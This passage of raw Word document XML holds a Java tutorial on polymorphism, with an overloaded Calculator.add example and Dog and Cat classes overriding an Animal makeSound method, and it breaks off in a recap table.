        </w:rPr>
        <w:t xml:space="preserve">. It means that you can use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>same method name</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interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to represent different behaviors, depending on the object that invokes the method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7E5347" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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Types of Polymorphism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654D76C6" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ile-time Polymorphism (Static Polymorphism)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Achieved through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Overloading</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Operator Overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (though Java doesn’t support operator overloading).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D27BAB" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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un-time Polymorphism (Dynamic Polymorphism)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Achieved through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Method Overriding</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DF44FD" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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75B8F13">
          <v:rect id="_x0000_i1364" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="606646AB" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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y is Polymorphism Useful?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB20721" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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de Reusability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can use the same method name for different implementations, making your code more readable and easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC8643E" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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lexibility and Extensibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows you to write more flexible code, as the same method name can be used for different objects (different types).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BA5D8B" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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E8C958E">
          <v:rect id="_x0000_i1365" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A347C1" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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of Polymorphism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4304A209"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Let’s explore both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Compile-time</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Run-time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Polymorphism through a real-world example.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C914E7" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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5257A2">
          <v:rect id="_x0000_i1366" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433AF64" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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1. Compile-time Polymorphism (Static Polymorphism) — Method Overloading:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC887C"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Calculator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106CF250" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E98A4E1"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Overloaded method for adding two integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FA1FF6"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add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8DA24"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C54C47"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A0C23C9" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EC5AC09"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Overloaded method for adding three integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0065C332"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add(int a, int b, int c) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFDF442"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a + b + c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B90706D"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F35F5C4" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="642236D1"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Overloaded method for adding two doubles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9DEF3B"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ouble add(double a, double b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EF7536"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a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55707D18"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77BF1CF"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8F88836" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="018E5CAF"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4D86499D"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33C2F40A"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alculator calc = new Calculator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918E711" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B65634D"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alc.add(5, 10));       // Calls add(int, int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9F3891"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alc.add(5, 10, 15));   // Calls add(int, int, int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564A0A56"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alc.add(5.5, 10.5));   // Calls add(double, double)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717B623A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257434DF"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61D14C4"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B2A787" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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e are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overloading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the add method with different parameter types and counts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D1B77D" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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compiler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> determines which method to call based on the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>number and types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of arguments provided.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C792142" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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is is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFDBB91" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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p w14:paraId="7A11744D"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15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7AAE2"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30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D534BC9"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16.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F33E3" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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BF89CAC">
          <v:rect id="_x0000_i1367" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C66B73" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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2. Run-time Polymorphism (Dynamic Polymorphism) — Method Overriding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14E867"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un-time polymorphism allows the method to behave differently based on the actual object being referred to by a reference variable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43249827"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Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDD6BF"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Method to be overridden by subclasses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585461A2"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3832749F"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Animal makes a sound");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B0B967"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0C55C64"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E76361B" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5806891E"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC71F8A"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Overriding the makeSound method of Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11AA3B"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5FBC5CA5"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583AFD28"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Dog barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0ED1DA"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5958EBB"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5918368" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A6B2711"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Cat extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC67B70"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Overriding the makeSound method of Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287A3D5F"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74913C80"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CAF649"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at meows");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5704B1"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85BE0A9"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7C65C28" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FCA3D2E"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2C99CE9A"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2397A8F6"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ing references of the parent class (Animal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C39B5FE"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nimal myDog = new Dog();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0795D6"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nimal myCat = new Cat();  // Parent reference, Child object</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470BEDEF" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FB3D6B2"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The actual method called is determined at runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21404195"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Dog.makeSound();  // Output: Dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920BF94"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Cat.makeSound();  // Output: Cat meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3862716D"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3A62236"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77B53A1"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2143EB15" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ere, the makeSound method is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>overridden</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dog</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Cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> subclasses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E42D2" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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method call is resolved at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, so when myDog.makeSound() is called, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dog’s version</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of makeSound is executed, and when myCat.makeSound() is called, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cat’s version</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637642FC" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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is is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>run-time polymorphism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4AF70" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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p w14:paraId="27FB3920"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og barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB4781"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t meows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7083199E" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003428C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7B9F3C83">
          <v:rect id="_x0000_i1368" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="707AC90B" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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Types of Polymorphism Reca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31"/>
        <w:gridCol w:w="1917"/>
        <w:gridCol w:w="4027"/>
      </w:tblGrid>
      <w:tr w:rsidR="003428CE" w:rsidRPr="00CE4B95" w14:paraId="14B43841" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="317F9492" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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ype of Polymorphism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06737C56" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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ow it's Achieved</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="177593CF" w14:textId="77777777" w:rsidR="000D78D3" w:rsidRPr="00CE4B95" w:rsidRDefault="000D78D3" w:rsidP="003428C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tc>
      </w:tr>
      <w:tr w:rsidR="003428CE" w:rsidRPr="00CE4B95" w14:paraId="0254B6F9" w14:textId="77777777" w:rsidTr="000D78D3">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60DED719"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ile-time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FEED0D7"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ethod Overloading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
